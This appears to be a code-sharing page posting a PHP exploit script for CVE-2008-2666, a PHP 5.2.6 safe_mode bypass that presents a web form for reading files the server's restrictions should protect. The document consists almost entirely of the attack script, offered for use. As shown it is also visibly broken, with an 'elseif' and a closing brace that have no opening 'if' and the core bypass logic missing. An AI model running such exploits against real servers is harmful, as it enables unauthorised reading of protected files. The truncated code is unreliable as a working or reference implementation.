/ Published in: PHP
Expand |
Embed | Plain Text
Copy this code and paste it in your HTML
<?php /* Exploit for CVE-2008-2666: http://securityreason.com/achievement_securityalert/55 Orginal URL http://securityreason.com/achievement_exploitalert/10 safe_mode Bypass PHP 5.2.6 by Maksymilian Arciemowicz http://securityreason.com cxib [at] securityreason [dot] com How to fix? Do not use safe_mode as a main safety */ echo "<PRE><P>This is exploit from <a href=\"http://securityreason.com\">http://securityreason.com</a>Maksymilian Arciemowicz<p>Script for legal use only.<p>PHP 5.2.6 safe_mode bypass<p>More: <a href=\"http://securityreason.com/news/0/0x24\">http://securityreason.com/news/0/0x24</a><p><form name=\"form\" action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_NAME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\" value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\" value=\"Show\"></form>\n"; } elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> doesn't exists or you don't have permissions.</CENTER></FONT>"); ?>